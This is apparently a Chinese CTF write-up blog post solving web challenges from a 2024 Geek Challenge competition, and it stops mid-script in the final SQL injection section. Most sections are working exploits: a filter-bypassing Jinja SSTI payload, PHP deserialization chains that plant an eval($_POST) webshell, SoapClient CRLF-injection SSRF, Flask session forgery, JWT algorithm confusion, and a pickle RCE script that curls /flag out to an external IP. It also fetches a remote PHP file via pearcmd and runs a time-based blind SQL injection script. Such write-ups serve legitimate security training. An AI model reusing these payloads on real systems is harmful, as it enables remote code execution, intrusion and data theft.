第十五届巅峰极客wp_web
Yu4xr安全博客

第十五届巅峰极客wp_web

admin
1年前发布 /正在检测是否收录...

第十五届巅峰极客wp_web部分

[TOC]

队伍总排名第13名,感谢好友pwn✌YX-hueimie带飞

Problem_On_My_Web

/forms路由存在xss漏洞

<script>alert(123)</script>

image-20241118201531821

此时Alert text:123

image-20241118201936061

测试留言:

<script>alert(document.cookie)</script>

image-20241118201858696

image-20241118203129397

这里通过报错直接就显示出来flag了,出题人的角度是想要我们进行fetch携带出来。

Can_you_Pass_Me

ssti模板注入

过滤内容:

'/','flag','+','base','__builtins__','[','cycler','set','{{', 
'class','config', 'os', 'popen', 'request', 'session', 'self', 'current_app', 
'get', '__globals__', '+', ':', '__globals__', '__init__', '__loader__', 
'_request_ctx_stack', '_update', 'add', 'after_request','read'

使用嵌套的with语句预处理命令字符串

通过join过滤器拼接被过滤的关键字

使用八进制编码绕过flag关键字

得出payload

{% with p = (('po','pen')|join) %}
{% with r = (('re','ad')|join) %}
{% print (url_for|attr(('__glo','bals__')|join)).pop(('o','s')|join)|attr(p)('cat $(printf "\\57\\146\\154\\141\\147") | rev')|attr(r)() %}
{% endwith %}
{% endwith %}

运行之后

image-20241118202640302

尝试cat app.py发现会对输出的内容做过滤 将内容进行base64编码,或者rev反转

cat $(printf "\57\146\154\141\147")|rev

image-20241118203631129

再反转:

┌──(root?ser724909388411)-[~]
└─# echo "}fa673cac9363-3f48-c154-db4b-0e190bde{CYS" | rev
SYC{edb091e0-b4bd-451c-84f3-3639cac376af}

ez_POP

SYC 类

Class SYC{
    public $starven;
    public function __call($name, $arguments){
        if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){
            die('no hack');
        }
        file_put_contents($this->starven,"<?php exit();".$this->starven);
    }
}
  • $starven 属性: 存储一个字符串,用于写入文件。
  • __call() 方法: 当调用一个不存在的方法时触发。该方法会检查 $starven 中是否包含敏感字符,如果包含则终止执行。否则,会在 $starven 值前添加 <?php exit(); 并写入文件。

lover 类

Class lover{
    public $J1rry;
    public $meimeng;
    public function __destruct(){
        if(isset($this->J1rry)&&file_get_contents($this->J1rry)=='Welcome GeekChallenge 2024'){
            echo "success";
            $this->meimeng->source;
        }
    }
    public function __invoke()
    {
        echo $this->meimeng;
    }
}
  • $J1rry 属性: 存储一个文件路径。
  • $meimeng 属性: 存储一个对象。
  • __destruct() 方法: 对象销毁时触发。如果 $J1rry 指向的文件内容是 'Welcome GeekChallenge 2024',则输出 "success",并访问 $meimeng 的 source 属性。
  • __invoke() 方法: 当对象被当作函数调用时触发,输出 $meimeng 属性值。

Geek 类

Class Geek{
    public $GSBP;
    public function __get($name){
        $Challenge = $this->GSBP;
        return $Challenge();
    }
    public function __toString(){
        $this->GSBP->Getflag();
        return "Just do it";
    }
}
  • $GSBP 属性: 存储一个对象。
  • __get() 方法: 当访问一个不存在的属性时触发,将 $GSBP 当作函数调用并返回。
  • __toString() 方法: 当对象被当作字符串使用时触发,调用 $GSBP 的 Getflag() 方法,并返回 "Just do it"。

漏洞利用链如下:

  1. __destruct(): 满足条件后,访问 $meimeng 对象的 source 属性,由于 lover 类没有 source 属性,触发 __get() 方法。
  2. __get(): 将 $GSBP 属性当作函数调用,触发 __invoke() 方法。
  3. __invoke(): 输出 $meimeng 属性,由于 $meimeng 是一个对象,触发 __toString() 方法。
  4. __toString(): 调用 $GSBP 对象的 Getflag() 方法,由于 lover 类没有 Getflag() 方法,触发 __call() 方法。
  5. __call(): 将 <?php exit(); 和 $starven 属性值写入到文件中。

接下来就是死亡函数绕过了:

 file_put_contents($this->starven,"<?php exit();".$this->starven);

死亡函数绕过payload网上有很多,但是这里存在一些过滤,所以这里的死亡函数绕过payload:

 php://filter/write=string.strip_tags/?>php_value auto_prepend_file /flag
 #/resource=.htaccess

EXP

<?php

Class SYC{
    public $starven="php://filter/write=string.strip_tags/?>php_value auto_prepend_file /flag"."\n"."#/resource=.htaccess";
    public function __call($name, $arguments){
        if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){
            die('no hack');
        }
        file_put_contents($this->starven,"<?php exit();".$this->starven);
    }
}
Class lover{
    public $J1rry="data://text/plain,Welcome GeekChallenge 2024";
    public $meimeng;
    public function __destruct(){
        if(isset($this->J1rry)&&file_get_contents($this->J1rry)=='Welcome GeekChallenge 2024'){
            echo "success";
            $this->meimeng->source;
        }
    }
    public function __invoke()
    {
        echo $this->meimeng;
    }
}
Class Geek{
    public $GSBP;
    public function __get($name){
        $Challenge = $this->GSBP;
        return $Challenge();
    }
    public function __toString(){
        $this->GSBP->Getflag();
        return "Just do it";
    }
}

$a=new lover();
$a->meimeng=new Geek();
$a->meimeng->GSBP=new lover();
$a->meimeng->GSBP->meimeng=new Geek();
$a->meimeng->GSBP->meimeng->GSBP=new SYC();
echo serialize($a);

?>

序列化后的 payload:

O:5:"lover":2:{s:5:"J1rry";s:44:"data://text/plain,Welcome%20GeekChallenge%202024";S:7:"\6deimeng";O:4:"Geek":1:{s:4:"GSBP";O:5:"lover":2:{s:5:"J1rry";N;S:7:"\6deimeng";O:4:"Geek":1:{s:4:"GSBP";O:3:"SYC":1:{s:7:"starven";s:93:"php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%2F%3F%3Ephp_value%20auto_prepend_file%20%2Fflag%0A%23%2Fresource%3D.htaccess";}}}}}

最终利用:

将上述序列化后的 payload 进行 URL 编码后,作为 data 参数的值发送 GET 请求:

http://target.com/index.php?data=O%3A5%3A%22lover%22%3A2%3A%7Bs%3A5%3A%22J1rry%22%3Bs%3A44%3A%22data%3A%2F%2Ftext%2Fplain%2CWelcome%2520GeekChallenge%25202024%22%3BS%3A7%3A%22%5C6deimeng%22%3

not_just_pop

考点:

  • PHP GC (Garbage Collection) 回收机制导致的 fast destruct__wakeup 方法中的属性数量不匹配: 在 7.1 之前的 PHP 版本中,如果反序列化期间对象的属性数量与类定义中的预期数量不匹配(特别是在处理 __wakeup 方法时),__wakeup 方法将不会执行
  • 绕过 disable_function:利用 phpinfo 信息泄露,结合蚁剑插件等工具绕过 disable_function 的限制。
  • sudo 提权:利用 sudo -l 发现 env 命令可以以 sudo 权限执行,从而读取 /flag。

反序列化链:

lhRaMK7::__destruct()  =>  Starven::__toString()  =>  Parar::__get()  =>  SYC::__isset()  =>  Starven::__call()  =>  lhRaMK7::__invoke()

exp

<?php

class lhRaMK7{
    public $web;
    public $You;
    public $love;
    public $bypass; //自定义变量
    public function __invoke()
    {
        echo "想你了,baby\n";
        eval($this->web);
    }
    public function __wakeup()
    {
        $this->web=$this->love;     
    }
    public function __destruct()
    {
        die($this->You->execurise=$this->Do);
    }
}

class Parar{
    private $execurise;
    public $lead;
    public $hansome;
    public function __set($name,$value)
    {
        echo $this->lead;
    }
    public function __get($args)
    {
        if(is_readable("/flag")){
            echo file_get_contents("/flag");
        }
        else{
            echo "还想直接读flag,洗洗睡吧,rce去"."\n";
            if ($this->execurise=="man!") {
                echo "居然没坠机"."\n";
                if(isset($this->hansome->lover)){
                    phpinfo(); // 用于绕过disable_function
                }
            }
            else{
                echo($this->execurise);
                echo "你也想被肘吗"."\n";
            }
        }
    }
}

class Starven{
    public $girl;
    public $friend;
    public function __toString()
    {
        return "试试所想的呗,说不定成功了"."\n".$this->girl->abc;
    }
    public function __call($args1,$args2)
    {
        $func=$this->friend;
        $func();
    }
}

class SYC{
    private $lover;
    public  $forever;
    public function __isset($args){
        return $this->forever->nononon();
    }
}

// 生成 Payload
$res=new lhRaMK7();
$res->You=new Parar();
$res->You->lead=new Starven();
$res->You->lead->girl=new Parar();
$res->You->lead->girl->hansome=new SYC();
$res->You->lead->girl->hansome->forever=new Starven();
$res->You->lead->girl->hansome->forever->friend=new lhRaMK7();
$res->You->lead->girl->hansome->forever->friend->love='echo 1;eval($_POST[1]);'; // 恶意代码,这里使用蚁剑的一句话木马
$pop=base64_encode(serialize($res));
echo "Payload:\n".$pop."\n";

/*
$Syclover = $pop;
if (isset($Syclover)) {
    unserialize(base64_decode($Syclover));
    echo "\nExploit finished.\n";
}else{
    echo("怎么不给我呢,是不喜欢吗?");
}
*/
?>

image-20241203170656333

sudo提权

sudo -l
sudo env cat /flag

image-20241203173942028

ez_SSRF

dirsearch -u 80-bbd25b5c-857e-4319-802e-22386c960ee7.challenge.ctfplus.cn

得www.zip

h4d333333.php

<?php
error_reporting(0);
if(!isset($_POST['user'])){
    $user="stranger";
}else{
    $user=$_POST['user'];
}

if (isset($_GET['location'])) {
    echo 233;
    $location=$_GET['location'];
    $client=new SoapClient(null,array(
        "location"=>$location,
        "uri"=>"hahaha",
        "login"=>"guest",
        "password"=>"gueeeeest!!!!",
        "user_agent"=>$user."'s Chrome"));

    $client->calculator();

    echo file_get_contents("result");
}else{
    echo "Please give me a location";
}
calculator.php
<?php
$admin="aaaaaaaaaaaadmin";
$adminpass="i_want_to_getI00_inMyT3st";

function check($auth) {
    global $admin,$adminpass;
    $auth = str_replace('Basic ', '', $auth);
    $auth = base64_decode($auth);
    list($username, $password) = explode(':', $auth);
    echo $username."<br>".$password;
    if($username===$admin && $password===$adminpass) {
        return 1;
    }else{
        return 2;
    }
}
if($_SERVER['REMOTE_ADDR']!=="127.0.0.1"){
    exit("Hacker");
}
$expression = $_POST['expression'];
$auth=$_SERVER['HTTP_AUTHORIZATION'];
if(isset($auth)){
    if (check($auth)===2) {
        if(!preg_match('/^[0-9+\-*\/]+$/', $expression)) {
            die("Invalid expression");
        }else{
            $result=eval("return $expression;");
            file_put_contents("result",$result);
        }
    }else{
        $result=eval("return $expression;");
        file_put_contents("result",$result);
    }
}else{
    exit("Hacker");
}

分析:

ssrf漏洞:

h4d333333.php文件允许我们通过location参数指定一个URL,然后使用SoapClient类访问该URL。

通过将location参数设置为http://127.0.0.1/calculator.php,我们可以让服务器请求其本地的calculator.php文件。

CRLF注入:

user参数的值被用作SoapClient的user_agent,这意味着我们可以通过CRLF注入来伪造HTTP请求头。

通过在user参数中注入CRLF,我们可以插入自定义的HTTP头,例如Authorization,以便通过calculator.php中的认证检查。

通过CRLF注入伪造Authorization头,使用题目中提供的用户名和密码进行认证。

执行点:calculator.php中允许我们通过expression参数传递一个数学表达式,并使用eval函数执行。

exp:

import requests
from base64 import b64encode

# 目标URL
url = "http://80-bbd25b5c-857e-4319-802e-22386c960ee7.challenge.ctfplus.cn/h4d333333.php"

# 构造Authorization头
username = "aaaaaaaaaaaadmin"
password = "i_want_to_getI00_inMyT3st"
auth = f"{username}:{password}"
auth_encoded = b64encode(auth.encode()).decode()

# 构造POST数据
post_data = {
    "user": f"film\r\nAuthorization: Basic {auth_encoded}\r\nContent-Length: 39\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nexpression=system('cat /flag > aaaa.txt');\r\n"
}

# 发送GET请求以设置location
get_params = {
    "location": "http://127.0.0.1/calculator.php"
}

# 发送请求
response = requests.post(url, params=get_params, data=post_data)

# 打印响应
print(response.text)

再访问aaaa.txt获取flag

py_game

注册登录

image-20241118204939373

发现flask尝试flaski的session伪造(https://www.cnblogs.com/meraklbz/p/18280537)

flask-unsign --unsign --cookie "eyJfZmxhc2hlcyI6W3siIHQiOlsic3VjY2VzcyIsIlx1NzY3Ylx1NWY1NVx1NjIxMFx1NTI5ZiJdfV0sInVzZXJuYW1lIjoiYWRtaW4xIn0.Zzs8Tw.9DFFwMpJwI5t4Nx1idVCj2C-_Jw"

secret_key破解session:得到'a123456'

flask-unsign --sign --secret "a123456" --cookie "{'_flashes': [('success', '登录成功')], 'username': 'admin'}"

伪造admin登录

得到源码在线反编译pyc

# uncompyle6 version 3.9.2
# Python bytecode version base 3.6 (3379)
# Decompiled from: Python 3.8.10 (default, Sep 11 2024, 16:02:53) 
# [GCC 9.4.0]
# Embedded file name: ./tempdata/1f9adc12-c6f3-4a8a-9054-aa3792d2ac2e.py
# Compiled at: 2024-11-01 17:37:26
# Size of source mod 2**32: 5558 bytes
import json
from lxml import etree
from flask import Flask, request, render_template, flash, redirect, url_for, session, Response, send_file, jsonify
app = Flask(__name__)
app.secret_key = "a123456"
app.config["xml_data"] = '<?xml version="1.0" encoding="UTF-8"?><GeekChallenge2024><EventName>Geek Challenge</EventName><Year>2024</Year><Description>This is a challenge event for geeks in the year 2024.</Description></GeekChallenge2024>'

class User:

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def check(self, data):
        return self.username == data["username"] and self.password == data["password"]


admin = User("admin", "123456j1rrynonono")
Users = [admin]

def update(src, dst):
    for k, v in src.items():
        if hasattr(dst, "__getitem__"):
            if dst.get(k):
                if isinstance(v, dict):
                    update(v, dst.get(k))
            dst[k] = v
        elif hasattr(dst, k) and isinstance(v, dict):
            update(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        for u in Users:
            if u.username == username:
                flash("用户名已存在", "error")
                return redirect(url_for("register"))

        new_user = User(username, password)
        Users.append(new_user)
        flash("注册成功!请登录", "success")
        return redirect(url_for("login"))
    else:
        return render_template("register.html")


@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        for u in Users:
            if u.check({'username':username,  'password':password}):
                session["username"] = username
                flash("登录成功", "success")
                return redirect(url_for("dashboard"))

        flash("用户名或密码错误", "error")
        return redirect(url_for("login"))
    else:
        return render_template("login.html")


@app.route("/play", methods=["GET", "POST"])
def play():
    if "username" in session:
        with open("/app/templates/play.html", "r", encoding="utf-8") as file:
            play_html = file.read()
        return play_html
    else:
        flash("请先登录", "error")
        return redirect(url_for("login"))


@app.route("/admin", methods=["GET", "POST"])
def admin():
    if "username" in session:
        if session["username"] == "admin":
            return render_template("admin.html", username=(session["username"]))
    flash("你没有权限访问", "error")
    return redirect(url_for("login"))


@app.route("/downloads321")
def downloads321():
    return send_file("./source/app.pyc", as_attachment=True)


@app.route("/")
def index():
    return render_template("index.html")


@app.route("/dashboard")
def dashboard():
    if "username" in session:
        is_admin = session["username"] == "admin"
        if is_admin:
            user_tag = "Admin User"
        else:
            user_tag = "Normal User"
        return render_template("dashboard.html", username=(session["username"]), tag=user_tag, is_admin=is_admin)
    else:
        flash("请先登录", "error")
        return redirect(url_for("login"))


@app.route("/xml_parse")
def xml_parse():
    try:
        xml_bytes = app.config["xml_data"].encode("utf-8")
        parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
        tree = etree.fromstring(xml_bytes, parser=parser)
        result_xml = etree.tostring(tree, pretty_print=True, encoding="utf-8", xml_declaration=True)
        return Response(result_xml, mimetype="application/xml")
    except etree.XMLSyntaxError as e:
        return str(e)


black_list = [
 "__class__".encode(), "__init__".encode(), "__globals__".encode()]

def check(data):
    print(data)
    for i in black_list:
        print(i)
        if i in data:
            print(i)
            return False

    return True


@app.route("/update", methods=["POST"])
def update_route():
    if "username" in session:
        if session["username"] == "admin":
            if request.data:
                try:
                    if not check(request.data):
                        return ('NONONO, Bad Hacker', 403)
                    else:
                        data = json.loads(request.data.decode())
                        print(data)
                        if all("static" not in str(value) and "dtd" not in str(value) and "file" not in str(value) and "environ" not in str(value) for value in data.values()):
                            update(data, User)
                            return (jsonify({"message": "更新成功"}), 200)
                        return ('Invalid character', 400)
                except Exception as e:
                    return (
                     f"Exception: {str(e)}", 500)

        else:
            return ('No data provided', 400)
    else:
        flash("你没有权限访问", "error")
        return redirect(url_for("login"))


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80, debug=False)

update路由存在python的原型链污染

json.loads()会对数据进行unicode解码所有unicode绕过即可

image-20241118212024670

image-20241118211221166

ez_python

注册登录访问/starven_s3cret得源码

import os
import secrets
from flask import Flask, request, render_template_string, make_response, render_template, send_file
import pickle
import base64
import black

app = Flask(__name__)

#To Ctfer:给你源码只是给你漏洞点的hint,怎么绕?black.py黑盒,唉无意义
@app.route('/')
def index():
    return render_template_string(open('templates/index.html').read())

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        usname = request.form['username']
        passwd = request.form['password']

        if usname and passwd:
            heart_cookie = secrets.token_hex(32)
            response = make_response(f"Registered successfully with username: {usname} <br> Now you can go to /login to heal starven's heart")
            response.set_cookie('heart', heart_cookie)
            return response

    return  render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    heart_cookie = request.cookies.get('heart')
    if not heart_cookie:
        return render_template('warning.html')

    if request.method == 'POST' and request.cookies.get('heart') == heart_cookie:
        statement = request.form['statement']

        try:
            heal_state = base64.b64decode(statement)
            print(heal_state)
            for i in black.blacklist:
                if i in heal_state:
                    return render_template('waf.html')
            pickle.loads(heal_state)
            res = make_response(f"Congratulations! You accomplished the first step of healing Starven's broken heart!")
            flag = os.getenv("GEEK_FLAG") or os.system("cat /flag")
            os.system("echo " + flag + " > /flag")
            return res
        except Exception as e:
            print( e)
            pass
            return "Error!!!! give you hint: maybe you can view /starven_s3cret"

    return render_template('login.html')

@app.route('/monologue',methods=['GET','POST'])
def joker():
    return render_template('joker.html')

@app.route('/starven_s3cret', methods=['GET', 'POST'])
def secret():
    return send_file(__file__,as_attachment=True)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=False)

wp:

import pickle
import base64
import requests

# 目标URL
url = "http://5000-3ce0e69f-74fe-4b5e-bbbd-fe04df5b6b58.challenge.ctfplus.cn/"  


def register_and_get_cookie():
    # 注册获取cookie
    register_data = {
        'username': 'test',
        'password': 'test'
    }
    r = requests.post(f"{url}/register", data=register_data)
    return r.cookies.get('heart')


class Evil:
    def __reduce__(self):
        # 构造命令
        cmd = "curl 149.88.79.51:6226/`cat /flag`"
        return (eval, ("__import__('os').system('" + cmd + "')",))


def create_payload():
    # 生成payload
    evil_pickle = pickle.dumps(Evil())
    return base64.b64encode(evil_pickle).decode()


def exploit():
    # 1. 获取cookie
    heart_cookie = register_and_get_cookie()
    if not heart_cookie:
        print("Failed to get heart cookie")
        return

    # 2. 构造payload
    payload = create_payload()

    # 3. 发送攻击请求
    cookies = {'heart': heart_cookie}
    data = {'statement': payload}

    try:
        r = requests.post(f"{url}/login", cookies=cookies, data=data)
        print("Response:", r.text)
    except Exception as e:
        print("Error:", e)


if __name__ == "__main__":
    exploit()

无回显外带flag

image-20241118212739456

baby_upload

非常简单的一道文件上传题目只检测文件名中是否包含了没有png,jpg字符

上传

a.png.php获得flag

<?php echo `cat /flag`; ?>

另外一张方法是根据中间件版本信息找到网上对应的cve漏洞

由404页面可以获得中间件的版本信息

image-20241203084732639

找到了CVE-2017-15715apache的一个解析漏洞

image-20241203084831436

ez_include

<?php
highlight_file(__FILE__);
require_once 'starven_secret.php';
if(isset($_GET['file'])) {
    if(preg_match('/starven_secret.php/i', $_GET['file'])) {
        require_once $_GET['file'];
    }else{
        echo "还想非预期?";
    }
}

require_once 语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。

/proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。

https://80-007ea987-3e44-4d3d-90af-48c2dc938fee.challenge.ctfplus.cn/?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/starven_secret.php
└─# echo "PD9waHANCiRzZWNyZXQgPSAiY29uZ3JhdHVsYXRpb24hIHlvdSBjYW4gZ290byAvbGV2ZWxsbGxsMi5waHAgdG8gY2FwdHVyZSB0aGUgZmxhZyEiOw0KPz4=" | base64 -d
<?php
$secret = "congratulation! you can goto /levelllll2.php to capture the flag!";
?>    

考察点pearcmd文件包含

有过滤只能远程文件下载pearcmd

http://149.88.79.51:8000/starven_secret.php

先下载

syc=/usr/local/lib/php/pearcmd&+tmp&+http://149.88.79.51:8000/starven_secret.php&file=/usr/local/lib/php/pearcmd.php

image-20241118220146532

image-20241118220304954

然后在第一关处包含

http://80-007ea987-3e44-4d3d-90af-48c2dc938fee.challenge.ctfplus.cn/?file=/tmp/tmp/pear/download/starven_secret.php

image-20241118220244356

jwt_pickle

import os
import secrets
from flask import Flask, request, render_template_string, make_response, render_template, send_file
import pickle
import base64
import black

app = Flask(__name__)

#To Ctfer:给你源码只是给你漏洞点的hint,怎么绕?black.py黑盒,唉无意义
@app.route('/')
def index():
    return render_template_string(open('templates/index.html').read())

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        usname = request.form['username']
        passwd = request.form['password']

        if usname and passwd:
            heart_cookie = secrets.token_hex(32)
            response = make_response(f"Registered successfully with username: {usname} <br> Now you can go to /login to heal starven's heart")
            response.set_cookie('heart', heart_cookie)
            return response

    return  render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    heart_cookie = request.cookies.get('heart')
    if not heart_cookie:
        return render_template('warning.html')

    if request.method == 'POST' and request.cookies.get('heart') == heart_cookie:
        statement = request.form['statement']

        try:
            heal_state = base64.b64decode(statement)
            print(heal_state)
            for i in black.blacklist:
                if i in heal_state:
                    return render_template('waf.html')
            pickle.loads(heal_state)
            res = make_response(f"Congratulations! You accomplished the first step of healing Starven's broken heart!")
            flag = os.getenv("GEEK_FLAG") or os.system("cat /flag")
            os.system("echo " + flag + " > /flag")
            return res
        except Exception as e:
            print( e)
            pass
            return "Error!!!! give you hint: maybe you can view /starven_s3cret"

    return render_template('login.html')

@app.route('/monologue',methods=['GET','POST'])
def joker():
    return render_template('joker.html')

@app.route('/starven_s3cret', methods=['GET', 'POST'])
def secret():
    return send_file(__file__,as_attachment=True)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=False)
# 签名使用RS256
token = jwt.encode(ss, privateKey, algorithm='RS256')
# 但验证时同时支持HS256和RS256
real = jwt.decode(token, publicKey, algorithms=['HS256', 'RS256'])发现签名和解密的算法不一样

# 1. 先注册两个账号获取两个合法的JWT token

# 2. 使用silentsignal/rsa_sign2n工具从两个token中提取公钥

docker run --rm -it portswigger/sig2n

image-20241118220717753

重新签名wp

import base64
import pickle
import os
import hmac
import hashlib
import json

# 1. 使用已知的RSA公钥
public_key_b64 = "LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JSUJDZ0tDQVFFQXQ4aUNvNEorQjhmeDNIaWxtcHQ0cTdpd0pUUFNDUHFlT2tHSUsvU1IxMFNKNmhyUE5ybW4KU3czQUszRkp0MW91V1ovNFBxUkIzS0QwOHZ4a01udnpqQWdwNW92MmljdUZVa0lva1NGZU1xd3hoVnJtdlovQwplTkpPK0ZwdXNUYWloTTdlMXl6M1lENlJCbnh3MjFQb2xDWVBkaDE2YU54VTRDeXNXNFFZTzJTVzZsWEFrZG1kCk9JYitsU2ZqYTRrNzdobEQwRm1Sb1Z6Wnc4eFpGTjdpaVJFUG1IcUQ2MEszWEw0ck8yMlBZQmdKM2F6SHh2THUKOCs3OThuenFtYXF5a0lPbjl2eFIyK3krZkRRcnBNblpCQUJ2aWk4SXpGdmgzWUgyT3BkQkhRWjhZZFE2ZzE5Wgpkb3JWNHllU2lBVzFadUNGTXJCUVEzNnBQWWRUQmwxZ0tRSURBUUFCCi0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K"
public_key = base64.b64decode(public_key_b64)

# 2. 构造恶意的pickle payload
class RCE:
    def __reduce__(self):
        return (eval, ("__import__('os').popen('cat /flag').read()",))

# 序列化payload
evil_obj = RCE()
evil_pickle = pickle.dumps(evil_obj)
evil_b64 = base64.b64encode(evil_pickle).decode()

# 3. 构造JWT header和payload
header = {
    "typ": "JWT",
    "alg": "HS256"
}

payload = {
    "username": "admin2",
    "password": "e10adc3949ba59abbe56e057f20f883e",
    "is_admin": True,
    "introduction": evil_b64,
    "exp": 1731998853
}

# 4. Base64编码header和payload
def base64url_encode(data):
    return base64.urlsafe_b64encode(json.dumps(data).encode()).rstrip(b'=').decode()

header_b64 = base64url_encode(header)
payload_b64 = base64url_encode(payload)

# 5. 计算签名
message = f"{header_b64}.{payload_b64}"
signature = hmac.new(
    public_key,
    message.encode(),
    hashlib.sha256
).digest()
signature_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

# 6. 组合最终的token
token = f"{header_b64}.{payload_b64}.{signature_b64}"

print("生成的攻击token:")
print(token)

print("\n请求头:")
print(f"Cookie: token={token}")

# 保存token到文件
with open('token.txt', 'w') as f:
    f.write(token)

携带发送即可

100%的

查看js源代码

发现满足条件image-20241118221141573

base64解码

SecretInDrivingSchool

f12查看源代码,的登陆地址提示:

账号为4-16位数字或者英文字母

密码格式为三位字母+@chengxing

猜测用户名admin ,爆破得密码SYC@chengxing

任意代码执行

image-20241118221416484

image-20241118221449363

rce_me

解题步骤:

首先需要绕过第一个检查:

if (!preg_match("/start.*now/is", $_POST["start"])) {

  if (strpos($_POST["start"], "start now") === false) {

​    die("Well, you haven't started.<br>");

  }

}

可以使用数组绕过:

POST: start[]=anything

然后需要满足sha1和md5的比较:

sha1((string) $_POST["__2024.geekchallenge.ctf"]) == md5("Geekchallenge2024_bmKtL") &&

(string) $_POST["__2024.geekchallenge.ctf"] != "Geekchallenge2024_bmKtL" &&

is_numeric(intval($_POST["__2024.geekchallenge.ctf"]))

由于md5("Geekchallenge2024_bmKtL")的值以0e开头,可以利用PHP弱类型比较,构造一个sha1值也是0e开头的数字字符串。

接下来需要绕过year的整数判断:

if (intval($year) < 2024 && intval($year + 1) > 2025)

这里可以利用整数溢出,构造一个很大的数字。

最后需要绕过purpose的检查:

if (preg_match("/.+?rce/ism", $purpose)) {

  die("nonono");

}

if (stripos($purpose, "rce") === false) {

  die("nonononono"); 

}

可以使用大小写绕过,如"rCe"。

完整的Payload:

POST:start[]=anything__2024.geekchallenge.ctf=10932435112

GET:?year=2147483647&purpose=rCe&code=system('cat /flag');

funnySQL

过滤了or,sleep,handler,and,=,ascii,rand,format,%0a,空格,information_schema

页面无回显可以尝试盲注,报错注入这里只能时间盲注

information_schema被过滤这里因为数据库版本原因这里只能爆破表面数据库名,列名是猜测的

无列名注入

这里的列名是猜测的为flag列名爆破不出来的因为information_schema被过滤,只能爆破表面使用mysql.innodb_index_stats来绕过

个人常用的模板exp:

import requests
import time


def blind_injection(target_type="database"):
    url = "http://80-a822b9bf-19cd-4f68-91fc-7c882b931ed7.challenge.ctfplus.cn/"
    result = ""
    pos = 1
    table_index = 0

    while True:
        found = False
        for char in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-{}":
            # 根据目标类型选择payload
            if target_type == "database":
                payload = f"1'/*!*//*!*/&&/*!*//*!*/7641/*!*/like/*!*/if((substr(database()/*!*//*!*/,{pos},1)/*!*/like/*!*/'{char}'),BENCHMARK(300000,MD5(0x5370524d)),7641)/*!*//*!*/#/*!*/coEJ"
            elif target_type == "table":
                payload = f"1'/*!*//*!*/&&/*!*//*!*/7641/*!*/like/*!*/IF((substr((select/*!*//*!*/table_name/*!*//*!*/from/*!*//*!*/mysql.innodb_index_stats/*!*//*!*/where/*!*//*!*/database_name/*!*/like/*!*/database()/*!*//*!*/limit/*!*//*!*/{table_index},1),{pos},1)/*!*/like/*!*/'{char}'),BENCHMARK(3000000,MD5(0x5370524d)),7641)/*!*//*!*/#/*!*/coEJ"
            elif target_type == "column":
                payload = f"1'/*!*//*!*/&&/*!*//*!*/7641/*!*/like/*!*/IF((substr((select/*!*//*!*/column_name/*!*//*!*/from/*!*//*!*/information_schema.columns/*!*//*!*/where/*!*//*!*/table_name/*!*/like/*!*/'Rea11ys3ccccccr3333t'/*!*//*!*/limit/*!*//*!*/{table_index},1),{pos},1)/*!*/like/*!*/'{char}'),BENCHMARK(3000000,MD5(0x5370524d)),7641)/*!*//*!*/#/*!*/coEJ"
            else:  # flag
                payload = f"1'/*!*//*!*/&&/*!*//*!*/7641/*!*/like/*!*/IF((substr((select/*!*//*!*/flag/*!*//*!*/from/*!*//*!*/Rea11ys3ccccccr3333t/*!*//*!*/limit/*!*//*!*/0,1),{pos},1)/*!*/like/*!*/'{char}'),BENCHMARK(3000000,MD5(0x5370524d)),7641)/*!*//*!*/#/*!*/coEJ"

            params = {"username": payload}

            start_time = time.time()
            try:
                response = requests.get(url, params=params, timeout=10, proxies={
                    "http": "192.168.164.1:8083"
                })
                elapsed_time = time.time() - start_time

                if elapsed_time > 0.8:
                    result += char
                    found = True
                    if target_type == "database":
                        print(f"数据库名称位置 {pos}: 发现字符 '{char}'")
                    elif target_type == "table":
                        print(f"表 {table_index}, 位置 {pos}: 发现字符 '{char}'")
                    elif target_type == "column":
                        print(f"列 {table_index}, 位置 {pos}: 发现字符 '{char}'")
                    else:
                        print(f"Flag 位置 {pos}: 发现字符 '{char}'")
                    print(f"当前结果: {result}")
                    break

            except requests.exceptions.Timeout:
                result += char
                found = True
                if target_type == "database":
                    print(f"数据库名称位置 {pos}: 发现字符 '{char}' (超时)")
                elif target_type == "table":
                    print(f"表 {table_index}, 位置 {pos}: 发现字符 '{char}' (超时)")
                elif target_type == "column":
                    print(f"列 {table_index}, 位置 {pos}: 发现字符 '{char}' (超时)")
                else:
                    print(f"Flag 位置 {pos}: 发现字符 '{char}' (超时)")
                print(f"当前结果: {result}")
                break

            except requests.exceptions.RequestException as e:
                print(f"发生错误: {e}")
                continue

        if not found:
            if target_type == "database":
                print(f"\n数据库名称: {result}")
                return result
            elif target_type in ["table", "column"]:
